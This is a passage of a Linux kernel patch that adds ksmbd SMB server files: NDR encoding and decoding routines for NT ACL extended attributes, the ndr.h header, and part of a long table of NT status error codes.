++	if (ret)
++		return ret;
++
++	ret = ndr_write_int64(n, acl->current_time);
++	if (ret)
++		return ret;
++
++	ret = ndr_write_bytes(n, acl->posix_acl_hash, XATTR_SD_HASH_SIZE);
++	if (ret)
++		return ret;
++
++	/* push ndr for security descriptor */
++	ret = ndr_write_bytes(n, acl->sd_buf, acl->sd_size);
++	return ret;
++}
++
++int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl)
++{
++	unsigned int version2;
++	int ret;
++
++	n->offset = 0;
++	ret = ndr_read_int16(n, &acl->version);
++	if (ret)
++		return ret;
++	if (acl->version != 4) {
++		ksmbd_debug(VFS, "v%d version is not supported\n", acl->version);
++		return -EINVAL;
++	}
++
++	ret = ndr_read_int32(n, &version2);
++	if (ret)
++		return ret;
++	if (acl->version != version2) {
++		ksmbd_debug(VFS, "ndr version mismatched(version: %d, version2: %d)\n",
++		       acl->version, version2);
++		return -EINVAL;
++	}
++
++	/* Read Level */
++	ret = ndr_read_int16(n, NULL);
++	if (ret)
++		return ret;
++
++	/* Read Ref Id */
++	ret = ndr_read_int32(n, NULL);
++	if (ret)
++		return ret;
++
++	ret = ndr_read_int16(n, &acl->hash_type);
++	if (ret)
++		return ret;
++
++	ret = ndr_read_bytes(n, acl->hash, XATTR_SD_HASH_SIZE);
++	if (ret)
++		return ret;
++
++	ndr_read_bytes(n, acl->desc, 10);
++	if (strncmp(acl->desc, "posix_acl", 9)) {
++		pr_err("Invalid acl description : %s\n", acl->desc);
++		return -EINVAL;
++	}
++
++	/* Read Time */
++	ret = ndr_read_int64(n, NULL);
++	if (ret)
++		return ret;
++
++	/* Read Posix ACL hash */
++	ret = ndr_read_bytes(n, acl->posix_acl_hash, XATTR_SD_HASH_SIZE);
++	if (ret)
++		return ret;
++
++	acl->sd_size = n->length - n->offset;
++	acl->sd_buf = kzalloc(acl->sd_size, GFP_KERNEL);
++	if (!acl->sd_buf)
++		return -ENOMEM;
++
++	ret = ndr_read_bytes(n, acl->sd_buf, acl->sd_size);
++	return ret;
++}
+diff --git a/fs/smb/server/ndr.h b/fs/smb/server/ndr.h
+new file mode 100644
+index 0000000000000..60ca265d1bb01
+--- /dev/null
++++ b/fs/smb/server/ndr.h
+@@ -0,0 +1,22 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2020 Samsung Electronics Co., Ltd.
++ *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
++ */
++
++struct ndr {
++	char	*data;
++	int	offset;
++	int	length;
++};
++
++#define NDR_NTSD_OFFSETOF	0xA0
++
++int ndr_encode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da);
++int ndr_decode_dos_attr(struct ndr *n, struct xattr_dos_attrib *da);
++int ndr_encode_posix_acl(struct ndr *n, struct user_namespace *user_ns,
++			 struct inode *inode, struct xattr_smb_acl *acl,
++			 struct xattr_smb_acl *def_acl);
++int ndr_encode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl);
++int ndr_encode_v3_ntacl(struct ndr *n, struct xattr_ntacl *acl);
++int ndr_decode_v4_ntacl(struct ndr *n, struct xattr_ntacl *acl);
+diff --git a/fs/smb/server/nterr.h b/fs/smb/server/nterr.h
+new file mode 100644
+index 0000000000000..2f358f88a0188
+--- /dev/null
++++ b/fs/smb/server/nterr.h
+@@ -0,0 +1,543 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ * Unix SMB/Netbios implementation.
++ * Version 1.9.
++ * NT error code constants
++ * Copyright (C) Andrew Tridgell              1992-2000
++ * Copyright (C) John H Terpstra              1996-2000
++ * Copyright (C) Luke Kenneth Casson Leighton 1996-2000
++ * Copyright (C) Paul Ashton                  1998-2000
++ */
++
++#ifndef _NTERR_H
++#define _NTERR_H
++
++/* Win32 Status codes. */
++#define NT_STATUS_MORE_ENTRIES         0x0105
++#define NT_ERROR_INVALID_PARAMETER     0x0057
++#define NT_ERROR_INSUFFICIENT_BUFFER   0x007a
++#define NT_STATUS_1804                 0x070c
++#define NT_STATUS_NOTIFY_ENUM_DIR      0x010c
++#define NT_STATUS_INVALID_LOCK_RANGE   (0xC0000000 | 0x01a1)
++/*
++ * Win32 Error codes extracted using a loop in smbclient then printing a netmon
++ * sniff to a file.
++ */
++
++#define NT_STATUS_OK                   0x0000
++#define NT_STATUS_SOME_UNMAPPED        0x0107
++#define NT_STATUS_BUFFER_OVERFLOW  0x80000005
++#define NT_STATUS_NO_MORE_ENTRIES  0x8000001a
++#define NT_STATUS_MEDIA_CHANGED    0x8000001c
++#define NT_STATUS_END_OF_MEDIA     0x8000001e
++#define NT_STATUS_MEDIA_CHECK      0x80000020
++#define NT_STATUS_NO_DATA_DETECTED 0x8000001c
++#define NT_STATUS_STOPPED_ON_SYMLINK 0x8000002d
++#define NT_STATUS_DEVICE_REQUIRES_CLEANING 0x80000288
++#define NT_STATUS_DEVICE_DOOR_OPEN 0x80000288
++#define NT_STATUS_UNSUCCESSFUL (0xC0000000 | 0x0001)
++#define NT_STATUS_NOT_IMPLEMENTED (0xC0000000 | 0x0002)
++#define NT_STATUS_INVALID_INFO_CLASS (0xC0000000 | 0x0003)
++#define NT_STATUS_INFO_LENGTH_MISMATCH (0xC0000000 | 0x0004)
++#define NT_STATUS_ACCESS_VIOLATION (0xC0000000 | 0x0005)
++#define NT_STATUS_IN_PAGE_ERROR (0xC0000000 | 0x0006)
++#define NT_STATUS_PAGEFILE_QUOTA (0xC0000000 | 0x0007)
++#define NT_STATUS_INVALID_HANDLE (0xC0000000 | 0x0008)
++#define NT_STATUS_BAD_INITIAL_STACK (0xC0000000 | 0x0009)
++#define NT_STATUS_BAD_INITIAL_PC (0xC0000000 | 0x000a)
++#define NT_STATUS_INVALID_CID (0xC0000000 | 0x000b)
++#define NT_STATUS_TIMER_NOT_CANCELED (0xC0000000 | 0x000c)
++#define NT_STATUS_INVALID_PARAMETER (0xC0000000 | 0x000d)
++#define NT_STATUS_NO_SUCH_DEVICE (0xC0000000 | 0x000e)
++#define NT_STATUS_NO_SUCH_FILE (0xC0000000 | 0x000f)
++#define NT_STATUS_INVALID_DEVICE_REQUEST (0xC0000000 | 0x0010)
++#define NT_STATUS_END_OF_FILE (0xC0000000 | 0x0011)
++#define NT_STATUS_WRONG_VOLUME (0xC0000000 | 0x0012)
++#define NT_STATUS_NO_MEDIA_IN_DEVICE (0xC0000000 | 0x0013)
++#define NT_STATUS_UNRECOGNIZED_MEDIA (0xC0000000 | 0x0014)
++#define NT_STATUS_NONEXISTENT_SECTOR (0xC0000000 | 0x0015)
++#define NT_STATUS_MORE_PROCESSING_REQUIRED (0xC0000000 | 0x0016)
++#define NT_STATUS_NO_MEMORY (0xC0000000 | 0x0017)
++#define NT_STATUS_CONFLICTING_ADDRESSES (0xC0000000 | 0x0018)
++#define NT_STATUS_NOT_MAPPED_VIEW (0xC0000000 | 0x0019)
++#define NT_STATUS_UNABLE_TO_FREE_VM (0x80000000 | 0x001a)
++#define NT_STATUS_UNABLE_TO_DELETE_SECTION (0xC0000000 | 0x001b)
++#define NT_STATUS_INVALID_SYSTEM_SERVICE (0xC0000000 | 0x001c)
++#define NT_STATUS_ILLEGAL_INSTRUCTION (0xC0000000 | 0x001d)
++#define NT_STATUS_INVALID_LOCK_SEQUENCE (0xC0000000 | 0x001e)
++#define NT_STATUS_INVALID_VIEW_SIZE (0xC0000000 | 0x001f)
++#define NT_STATUS_INVALID_FILE_FOR_SECTION (0xC0000000 | 0x0020)
++#define NT_STATUS_ALREADY_COMMITTED (0xC0000000 | 0x0021)
++#define NT_STATUS_ACCESS_DENIED (0xC0000000 | 0x0022)
++#define NT_STATUS_BUFFER_TOO_SMALL (0xC0000000 | 0x0023)
++#define NT_STATUS_OBJECT_TYPE_MISMATCH (0xC0000000 | 0x0024)
++#define NT_STATUS_NONCONTINUABLE_EXCEPTION (0xC0000000 | 0x0025)
++#define NT_STATUS_INVALID_DISPOSITION (0xC0000000 | 0x0026)
++#define NT_STATUS_UNWIND (0xC0000000 | 0x0027)
++#define NT_STATUS_BAD_STACK (0xC0000000 | 0x0028)
++#define NT_STATUS_INVALID_UNWIND_TARGET (0xC0000000 | 0x0029)
++#define NT_STATUS_NOT_LOCKED (0xC0000000 | 0x002a)
++#define NT_STATUS_PARITY_ERROR (0xC0000000 | 0x002b)
++#define NT_STATUS_UNABLE_TO_DECOMMIT_VM (0xC0000000 | 0x002c)
++#define NT_STATUS_NOT_COMMITTED (0xC0000000 | 0x002d)
++#define NT_STATUS_INVALID_PORT_ATTRIBUTES (0xC0000000 | 0x002e)
++#define NT_STATUS_PORT_MESSAGE_TOO_LONG (0xC0000000 | 0x002f)
++#define NT_STATUS_INVALID_PARAMETER_MIX (0xC0000000 | 0x0030)
++#define NT_STATUS_INVALID_QUOTA_LOWER (0xC0000000 | 0x0031)
++#define NT_STATUS_DISK_CORRUPT_ERROR (0xC0000000 | 0x0032)
++#define NT_STATUS_OBJECT_NAME_INVALID (0xC0000000 | 0x0033)
++#define NT_STATUS_OBJECT_NAME_NOT_FOUND (0xC0000000 | 0x0034)
++#define NT_STATUS_OBJECT_NAME_COLLISION (0xC0000000 | 0x0035)
++#define NT_STATUS_HANDLE_NOT_WAITABLE (0xC0000000 | 0x0036)
++#define NT_STATUS_PORT_DISCONNECTED (0xC0000000 | 0x0037)
++#define NT_STATUS_DEVICE_ALREADY_ATTACHED (0xC0000000 | 0x0038)
++#define NT_STATUS_OBJECT_PATH_INVALID (0xC0000000 | 0x0039)
++#define NT_STATUS_OBJECT_PATH_NOT_FOUND (0xC0000000 | 0x003a)
++#define NT_STATUS_OBJECT_PATH_SYNTAX_BAD (0xC0000000 | 0x003b)
++#define NT_STATUS_DATA_OVERRUN (0xC0000000 | 0x003c)
++#define NT_STATUS_DATA_LATE_ERROR (0xC0000000 | 0x003d)
++#define NT_STATUS_DATA_ERROR (0xC0000000 | 0x003e)
++#define NT_STATUS_CRC_ERROR (0xC0000000 | 0x003f)
++#define NT_STATUS_SECTION_TOO_BIG (0xC0000000 | 0x0040)
++#define NT_STATUS_PORT_CONNECTION_REFUSED (0xC0000000 | 0x0041)
++#define NT_STATUS_INVALID_PORT_HANDLE (0xC0000000 | 0x0042)
++#define NT_STATUS_SHARING_VIOLATION (0xC0000000 | 0x0043)
++#define NT_STATUS_QUOTA_EXCEEDED (0xC0000000 | 0x0044)
++#define NT_STATUS_INVALID_PAGE_PROTECTION (0xC0000000 | 0x0045)
++#define NT_STATUS_MUTANT_NOT_OWNED (0xC0000000 | 0x0046)
++#define NT_STATUS_SEMAPHORE_LIMIT_EXCEEDED (0xC0000000 | 0x0047)
++#define NT_STATUS_PORT_ALREADY_SET (0xC0000000 | 0x0048)
++#define NT_STATUS_SECTION_NOT_IMAGE (0xC0000000 | 0x0049)
++#define NT_STATUS_SUSPEND_COUNT_EXCEEDED (0xC0000000 | 0x004a)
++#define NT_STATUS_THREAD_IS_TERMINATING (0xC0000000 | 0x004b)
++#define NT_STATUS_BAD_WORKING_SET_LIMIT (0xC0000000 | 0x004c)
++#define NT_STATUS_INCOMPATIBLE_FILE_MAP (0xC0000000 | 0x004d)
++#define NT_STATUS_SECTION_PROTECTION (0xC0000000 | 0x004e)
++#define NT_STATUS_EAS_NOT_SUPPORTED (0xC0000000 | 0x004f)
++#define NT_STATUS_EA_TOO_LARGE (0xC0000000 | 0x0050)
++#define NT_STATUS_NONEXISTENT_EA_ENTRY (0xC0000000 | 0x0051)
++#define NT_STATUS_NO_EAS_ON_FILE (0xC0000000 | 0x0052)
++#define NT_STATUS_EA_CORRUPT_ERROR (0xC0000000 | 0x0053)
++#define NT_STATUS_FILE_LOCK_CONFLICT (0xC0000000 | 0x0054)
++#define NT_STATUS_LOCK_NOT_GRANTED (0xC0000000 | 0x0055)
++#define NT_STATUS_DELETE_PENDING (0xC0000000 | 0x0056)
++#define NT_STATUS_CTL_FILE_NOT_SUPPORTED (0xC0000000 | 0x0057)
++#define NT_STATUS_UNKNOWN_REVISION (0xC0000000 | 0x0058)
++#define NT_STATUS_REVISION_MISMATCH (0xC0000000 | 0x0059)
++#define NT_STATUS_INVALID_OWNER (0xC0000000 | 0x005a)
++#define NT_STATUS_INVALID_PRIMARY_GROUP (0xC0000000 | 0x005b)
++#define NT_STATUS_NO_IMPERSONATION_TOKEN (0xC0000000 | 0x005c)
++#define NT_STATUS_CANT_DISABLE_MANDATORY (0xC0000000 | 0x005d)
++#define NT_STATUS_NO_LOGON_SERVERS (0xC0000000 | 0x005e)
++#define NT_STATUS_NO_SUCH_LOGON_SESSION (0xC0000000 | 0x005f)
++#define NT_STATUS_NO_SUCH_PRIVILEGE (0xC0000000 | 0x0060)
++#define NT_STATUS_PRIVILEGE_NOT_HELD (0xC0000000 | 0x0061)
++#define NT_STATUS_INVALID_ACCOUNT_NAME (0xC0000000 | 0x0062)
++#define NT_STATUS_USER_EXISTS (0xC0000000 | 0x0063)
++#define NT_STATUS_NO_SUCH_USER (0xC0000000 | 0x0064)
++#define NT_STATUS_GROUP_EXISTS (0xC0000000 | 0x0065)
++#define NT_STATUS_NO_SUCH_GROUP (0xC0000000 | 0x0066)
++#define NT_STATUS_MEMBER_IN_GROUP (0xC0000000 | 0x0067)
++#define NT_STATUS_MEMBER_NOT_IN_GROUP (0xC0000000 | 0x0068)
++#define NT_STATUS_LAST_ADMIN (0xC0000000 | 0x0069)
++#define NT_STATUS_WRONG_PASSWORD (0xC0000000 | 0x006a)
++#define NT_STATUS_ILL_FORMED_PASSWORD (0xC0000000 | 0x006b)
++#define NT_STATUS_PASSWORD_RESTRICTION (0xC0000000 | 0x006c)
++#define NT_STATUS_LOGON_FAILURE (0xC0000000 | 0x006d)
++#define NT_STATUS_ACCOUNT_RESTRICTION (0xC0000000 | 0x006e)
++#define NT_STATUS_INVALID_LOGON_HOURS (0xC0000000 | 0x006f)
++#define NT_STATUS_INVALID_WORKSTATION (0xC0000000 | 0x0070)
++#define NT_STATUS_PASSWORD_EXPIRED (0xC0000000 | 0x0071)
++#define NT_STATUS_ACCOUNT_DISABLED (0xC0000000 | 0x0072)
++#define NT_STATUS_NONE_MAPPED (0xC0000000 | 0x0073)
++#define NT_STATUS_TOO_MANY_LUIDS_REQUESTED (0xC0000000 | 0x0074)
++#define NT_STATUS_LUIDS_EXHAUSTED (0xC0000000 | 0x0075)
++#define NT_STATUS_INVALID_SUB_AUTHORITY (0xC0000000 | 0x0076)
++#define NT_STATUS_INVALID_ACL (0xC0000000 | 0x0077)
++#define NT_STATUS_INVALID_SID (0xC0000000 | 0x0078)
++#define NT_STATUS_INVALID_SECURITY_DESCR (0xC0000000 | 0x0079)
++#define NT_STATUS_PROCEDURE_NOT_FOUND (0xC0000000 | 0x007a)
++#define NT_STATUS_INVALID_IMAGE_FORMAT (0xC0000000 | 0x007b)
++#define NT_STATUS_NO_TOKEN (0xC0000000 | 0x007c)
++#define NT_STATUS_BAD_INHERITANCE_ACL (0xC0000000 | 0x007d)
++#define NT_STATUS_RANGE_NOT_LOCKED (0xC0000000 | 0x007e)
++#define NT_STATUS_DISK_FULL (0xC0000000 | 0x007f)
++#define NT_STATUS_SERVER_DISABLED (0xC0000000 | 0x0080)
++#define NT_STATUS_SERVER_NOT_DISABLED (0xC0000000 | 0x0081)
++#define NT_STATUS_TOO_MANY_GUIDS_REQUESTED (0xC0000000 | 0x0082)
++#define NT_STATUS_GUIDS_EXHAUSTED (0xC0000000 | 0x0083)
++#define NT_STATUS_INVALID_ID_AUTHORITY (0xC0000000 | 0x0084)
++#define NT_STATUS_AGENTS_EXHAUSTED (0xC0000000 | 0x0085)
++#define NT_STATUS_INVALID_VOLUME_LABEL (0xC0000000 | 0x0086)
++#define NT_STATUS_SECTION_NOT_EXTENDED (0xC0000000 | 0x0087)
++#define NT_STATUS_NOT_MAPPED_DATA (0xC0000000 | 0x0088)
++#define NT_STATUS_RESOURCE_DATA_NOT_FOUND (0xC0000000 | 0x0089)
++#define NT_STATUS_RESOURCE_TYPE_NOT_FOUND (0xC0000000 | 0x008a)
++#define NT_STATUS_RESOURCE_NAME_NOT_FOUND (0xC0000000 | 0x008b)
++#define NT_STATUS_ARRAY_BOUNDS_EXCEEDED (0xC0000000 | 0x008c)
++#define NT_STATUS_FLOAT_DENORMAL_OPERAND (0xC0000000 | 0x008d)
++#define NT_STATUS_FLOAT_DIVIDE_BY_ZERO (0xC0000000 | 0x008e)
++#define NT_STATUS_FLOAT_INEXACT_RESULT (0xC0000000 | 0x008f)
++#define NT_STATUS_FLOAT_INVALID_OPERATION (0xC0000000 | 0x0090)
++#define NT_STATUS_FLOAT_OVERFLOW (0xC0000000 | 0x0091)
++#define NT_STATUS_FLOAT_STACK_CHECK (0xC0000000 | 0x0092)
++#define NT_STATUS_FLOAT_UNDERFLOW (0xC0000000 | 0x0093)
++#define NT_STATUS_INTEGER_DIVIDE_BY_ZERO (0xC0000000 | 0x0094)
++#define NT_STATUS_INTEGER_OVERFLOW (0xC0000000 | 0x0095)
++#define NT_STATUS_PRIVILEGED_INSTRUCTION (0xC0000000 | 0x0096)
++#define NT_STATUS_TOO_MANY_PAGING_FILES (0xC0000000 | 0x0097)
++#define NT_STATUS_FILE_INVALID (0xC0000000 | 0x0098)
++#define NT_STATUS_ALLOTTED_SPACE_EXCEEDED (0xC0000000 | 0x0099)
++#define NT_STATUS_INSUFFICIENT_RESOURCES (0xC0000000 | 0x009a)
++#define NT_STATUS_DFS_EXIT_PATH_FOUND (0xC0000000 | 0x009b)
++#define NT_STATUS_DEVICE_DATA_ERROR (0xC0000000 | 0x009c)
++#define NT_STATUS_DEVICE_NOT_CONNECTED (0xC0000000 | 0x009d)
++#define NT_STATUS_DEVICE_POWER_FAILURE (0xC0000000 | 0x009e)
++#define NT_STATUS_FREE_VM_NOT_AT_BASE (0xC0000000 | 0x009f)
++#define NT_STATUS_MEMORY_NOT_ALLOCATED (0xC0000000 | 0x00a0)
++#define NT_STATUS_WORKING_SET_QUOTA (0xC0000000 | 0x00a1)
++#define NT_STATUS_MEDIA_WRITE_PROTECTED (0xC0000000 | 0x00a2)
++#define NT_STATUS_DEVICE_NOT_READY (0xC0000000 | 0x00a3)
++#define NT_STATUS_INVALID_GROUP_ATTRIBUTES (0xC0000000 | 0x00a4)
++#define NT_STATUS_BAD_IMPERSONATION_LEVEL (0xC0000000 | 0x00a5)
++#define NT_STATUS_CANT_OPEN_ANONYMOUS (0xC0000000 | 0x00a6)
++#define NT_STATUS_BAD_VALIDATION_CLASS (0xC0000000 | 0x00a7)
++#define NT_STATUS_BAD_TOKEN_TYPE (0xC0000000 | 0x00a8)
++#define NT_STATUS_BAD_MASTER_BOOT_RECORD (0xC0000000 | 0x00a9)
++#define NT_STATUS_INSTRUCTION_MISALIGNMENT (0xC0000000 | 0x00aa)
++#define NT_STATUS_INSTANCE_NOT_AVAILABLE (0xC0000000 | 0x00ab)
++#define NT_STATUS_PIPE_NOT_AVAILABLE (0xC0000000 | 0x00ac)
++#define NT_STATUS_INVALID_PIPE_STATE (0xC0000000 | 0x00ad)
++#define NT_STATUS_PIPE_BUSY (0xC0000000 | 0x00ae)
++#define NT_STATUS_ILLEGAL_FUNCTION (0xC0000000 | 0x00af)
++#define NT_STATUS_PIPE_DISCONNECTED (0xC0000000 | 0x00b0)
++#define NT_STATUS_PIPE_CLOSING (0xC0000000 | 0x00b1)
++#define NT_STATUS_PIPE_CONNECTED (0xC0000000 | 0x00b2)
++#define NT_STATUS_PIPE_LISTENING (0xC0000000 | 0x00b3)
++#define NT_STATUS_INVALID_READ_MODE (0xC0000000 | 0x00b4)
++#define NT_STATUS_IO_TIMEOUT (0xC0000000 | 0x00b5)
++#define NT_STATUS_FILE_FORCED_CLOSED (0xC0000000 | 0x00b6)
++#define NT_STATUS_PROFILING_NOT_STARTED (0xC0000000 | 0x00b7)
++#define NT_STATUS_PROFILING_NOT_STOPPED (0xC0000000 | 0x00b8)
++#define NT_STATUS_COULD_NOT_INTERPRET (0xC0000000 | 0x00b9)
++#define NT_STATUS_FILE_IS_A_DIRECTORY (0xC0000000 | 0x00ba)
++#define NT_STATUS_NOT_SUPPORTED (0xC0000000 | 0x00bb)
++#define NT_STATUS_REMOTE_NOT_LISTENING (0xC0000000 | 0x00bc)
++#define NT_STATUS_DUPLICATE_NAME (0xC0000000 | 0x00bd)
++#define NT_STATUS_BAD_NETWORK_PATH (0xC0000000 | 0x00be)
++#define NT_STATUS_NETWORK_BUSY (0xC0000000 | 0x00bf)
++#define NT_STATUS_DEVICE_DOES_NOT_EXIST (0xC0000000 | 0x00c0)
++#define NT_STATUS_TOO_MANY_COMMANDS (0xC0000000 | 0x00c1)
++#define NT_STATUS_ADAPTER_HARDWARE_ERROR (0xC0000000 | 0x00c2)
++#define NT_STATUS_INVALID_NETWORK_RESPONSE (0xC0000000 | 0x00c3)
++#define NT_STATUS_UNEXPECTED_NETWORK_ERROR (0xC0000000 | 0x00c4)
++#define NT_STATUS_BAD_REMOTE_ADAPTER (0xC0000000 | 0x00c5)
++#define NT_STATUS_PRINT_QUEUE_FULL (0xC0000000 | 0x00c6)
++#define NT_STATUS_NO_SPOOL_SPACE (0xC0000000 | 0x00c7)
++#define NT_STATUS_PRINT_CANCELLED (0xC0000000 | 0x00c8)
++#define NT_STATUS_NETWORK_NAME_DELETED (0xC0000000 | 0x00c9)
++#define NT_STATUS_NETWORK_ACCESS_DENIED (0xC0000000 | 0x00ca)
++#define NT_STATUS_BAD_DEVICE_TYPE (0xC0000000 | 0x00cb)
++#define NT_STATUS_BAD_NETWORK_NAME (0xC0000000 | 0x00cc)
++#define NT_STATUS_TOO_MANY_NAMES (0xC0000000 | 0x00cd)
++#define NT_STATUS_TOO_MANY_SESSIONS (0xC0000000 | 0x00ce)
++#define NT_STATUS_SHARING_PAUSED (0xC0000000 | 0x00cf)
++#define NT_STATUS_REQUEST_NOT_ACCEPTED (0xC0000000 | 0x00d0)
++#define NT_STATUS_REDIRECTOR_PAUSED (0xC0000000 | 0x00d1)
++#define NT_STATUS_NET_WRITE_FAULT (0xC0000000 | 0x00d2)
++#define NT_STATUS_PROFILING_AT_LIMIT (0xC0000000 | 0x00d3)
++#define NT_STATUS_NOT_SAME_DEVICE (0xC0000000 | 0x00d4)
++#define NT_STATUS_FILE_RENAMED (0xC0000000 | 0x00d5)
++#define NT_STATUS_VIRTUAL_CIRCUIT_CLOSED (0xC0000000 | 0x00d6)
++#define NT_STATUS_NO_SECURITY_ON_OBJECT (0xC0000000 | 0x00d7)
++#define NT_STATUS_CANT_WAIT (0xC0000000 | 0x00d8)
++#define NT_STATUS_PIPE_EMPTY (0xC0000000 | 0x00d9)
++#define NT_STATUS_CANT_ACCESS_DOMAIN_INFO (0xC0000000 | 0x00da)
++#define NT_STATUS_CANT_TERMINATE_SELF (0xC0000000 | 0x00db)
++#define NT_STATUS_INVALID_SERVER_STATE (0xC0000000 | 0x00dc)
++#define NT_STATUS_INVALID_DOMAIN_STATE (0xC0000000 | 0x00dd)
++#define NT_STATUS_INVALID_DOMAIN_ROLE (0xC0000000 | 0x00de)
++#define NT_STATUS_NO_SUCH_DOMAIN (0xC0000000 | 0x00df)
++#define NT_STATUS_DOMAIN_EXISTS (0xC0000000 | 0x00e0)
++#define NT_STATUS_DOMAIN_LIMIT_EXCEEDED (0xC0000000 | 0x00e1)
++#define NT_STATUS_OPLOCK_NOT_GRANTED (0xC0000000 | 0x00e2)
++#define NT_STATUS_INVALID_OPLOCK_PROTOCOL (0xC0000000 | 0x00e3)
++#define NT_STATUS_INTERNAL_DB_CORRUPTION (0xC0000000 | 0x00e4)
++#define NT_STATUS_INTERNAL_ERROR (0xC0000000 | 0x00e5)
++#define NT_STATUS_GENERIC_NOT_MAPPED (0xC0000000 | 0x00e6)
++#define NT_STATUS_BAD_DESCRIPTOR_FORMAT (0xC0000000 | 0x00e7)
++#define NT_STATUS_INVALID_USER_BUFFER (0xC0000000 | 0x00e8)
++#define NT_STATUS_UNEXPECTED_IO_ERROR (0xC0000000 | 0x00e9)
++#define NT_STATUS_UNEXPECTED_MM_CREATE_ERR (0xC0000000 | 0x00ea)
++#define NT_STATUS_UNEXPECTED_MM_MAP_ERROR (0xC0000000 | 0x00eb)
++#define NT_STATUS_UNEXPECTED_MM_EXTEND_ERR (0xC0000000 | 0x00ec)
++#define NT_STATUS_NOT_LOGON_PROCESS (0xC0000000 | 0x00ed)
++#define NT_STATUS_LOGON_SESSION_EXISTS (0xC0000000 | 0x00ee)
++#define NT_STATUS_INVALID_PARAMETER_1 (0xC0000000 | 0x00ef)
++#define NT_STATUS_INVALID_PARAMETER_2 (0xC0000000 | 0x00f0)
++#define NT_STATUS_INVALID_PARAMETER_3 (0xC0000000 | 0x00f1)
++#define NT_STATUS_INVALID_PARAMETER_4 (0xC0000000 | 0x00f2)
++#define NT_STATUS_INVALID_PARAMETER_5 (0xC0000000 | 0x00f3)
++#define NT_STATUS_INVALID_PARAMETER_6 (0xC0000000 | 0x00f4)
++#define NT_STATUS_INVALID_PARAMETER_7 (0xC0000000 | 0x00f5)
++#define NT_STATUS_INVALID_PARAMETER_8 (0xC0000000 | 0x00f6)
++#define NT_STATUS_INVALID_PARAMETER_9 (0xC0000000 | 0x00f7)
++#define NT_STATUS_INVALID_PARAMETER_10 (0xC0000000 | 0x00f8)
++#define NT_STATUS_INVALID_PARAMETER_11 (0xC0000000 | 0x00f9)
++#define NT_STATUS_INVALID_PARAMETER_12 (0xC0000000 | 0x00fa)
++#define NT_STATUS_REDIRECTOR_NOT_STARTED (0xC0000000 | 0x00fb)
++#define NT_STATUS_REDIRECTOR_STARTED (0xC0000000 | 0x00fc)
++#define NT_STATUS_STACK_OVERFLOW (0xC0000000 | 0x00fd)
++#define NT_STATUS_NO_SUCH_PACKAGE (0xC0000000 | 0x00fe)
++#define NT_STATUS_BAD_FUNCTION_TABLE (0xC0000000 | 0x00ff)
++#define NT_STATUS_DIRECTORY_NOT_EMPTY (0xC0000000 | 0x0101)
++#define NT_STATUS_FILE_CORRUPT_ERROR (0xC0000000 | 0x0102)
++#define NT_STATUS_NOT_A_DIRECTORY (0xC0000000 | 0x0103)
++#define NT_STATUS_BAD_LOGON_SESSION_STATE (0xC0000000 | 0x0104)
++#define NT_STATUS_LOGON_SESSION_COLLISION (0xC0000000 | 0x0105)
++#define NT_STATUS_NAME_TOO_LONG (0xC0000000 | 0x0106)
++#define NT_STATUS_FILES_OPEN (0xC0000000 | 0x0107)
++#define NT_STATUS_CONNECTION_IN_USE (0xC0000000 | 0x0108)
++#define NT_STATUS_MESSAGE_NOT_FOUND (0xC0000000 | 0x0109)
++#define NT_STATUS_PROCESS_IS_TERMINATING (0xC0000000 | 0x010a)
++#define NT_STATUS_INVALID_LOGON_TYPE (0xC0000000 | 0x010b)
++#define NT_STATUS_NO_GUID_TRANSLATION (0xC0000000 | 0x010c)
++#define NT_STATUS_CANNOT_IMPERSONATE (0xC0000000 | 0x010d)
++#define NT_STATUS_IMAGE_ALREADY_LOADED (0xC0000000 | 0x010e)
++#define NT_STATUS_ABIOS_NOT_PRESENT (0xC0000000 | 0x010f)
++#define NT_STATUS_ABIOS_LID_NOT_EXIST (0xC0000000 | 0x0110)
++#define NT_STATUS_ABIOS_LID_ALREADY_OWNED (0xC0000000 | 0x0111)
++#define NT_STATUS_ABIOS_NOT_LID_OWNER (0xC0000000 | 0x0112)
++#define NT_STATUS_ABIOS_INVALID_COMMAND (0xC0000000 | 0x0113)
++#define NT_STATUS_ABIOS_INVALID_LID (0xC0000000 | 0x0114)
++#define NT_STATUS_ABIOS_SELECTOR_NOT_AVAILABLE (0xC0000000 | 0x0115)
++#define NT_STATUS_ABIOS_INVALID_SELECTOR (0xC0000000 | 0x0116)
++#define NT_STATUS_NO_LDT (0xC0000000 | 0x0117)
++#define NT_STATUS_INVALID_LDT_SIZE (0xC0000000 | 0x0118)
++#define NT_STATUS_INVALID_LDT_OFFSET (0xC0000000 | 0x0119)
++#define NT_STATUS_INVALID_LDT_DESCRIPTOR (0xC0000000 | 0x011a)
++#define NT_STATUS_INVALID_IMAGE_NE_FORMAT (0xC0000000 | 0x011b)
++#define NT_STATUS_RXACT_INVALID_STATE (0xC0000000 | 0x011c)
++#define NT_STATUS_RXACT_COMMIT_FAILURE (0xC0000000 | 0x011d)
++#define NT_STATUS_MAPPED_FILE_SIZE_ZERO (0xC0000000 | 0x011e)
++#define NT_STATUS_TOO_MANY_OPENED_FILES (0xC0000000 | 0x011f)
++#define NT_STATUS_CANCELLED (0xC0000000 | 0x0120)
++#define NT_STATUS_CANNOT_DELETE (0xC0000000 | 0x0121)
++#define NT_STATUS_INVALID_COMPUTER_NAME (0xC0000000 | 0x0122)
++#define NT_STATUS_FILE_DELETED (0xC0000000 | 0x0123)
++#define NT_STATUS_SPECIAL_ACCOUNT (0xC0000000 | 0x0124)
++#define NT_STATUS_SPECIAL_GROUP (0xC0000000 | 0x0125)
++#define NT_STATUS_SPECIAL_USER (0xC0000000 | 0x0126)
++#define NT_STATUS_MEMBERS_PRIMARY_GROUP (0xC0000000 | 0x0127)
++#define NT_STATUS_FILE_CLOSED (0xC0000000 | 0x0128)
++#define NT_STATUS_TOO_MANY_THREADS (0xC0000000 | 0x0129)
++#define NT_STATUS_THREAD_NOT_IN_PROCESS (0xC0000000 | 0x012a)
++#define NT_STATUS_TOKEN_ALREADY_IN_USE (0xC0000000 | 0x012b)
++#define NT_STATUS_PAGEFILE_QUOTA_EXCEEDED (0xC0000000 | 0x012c)
++#define NT_STATUS_COMMITMENT_LIMIT (0xC0000000 | 0x012d)
++#define NT_STATUS_INVALID_IMAGE_LE_FORMAT (0xC0000000 | 0x012e)
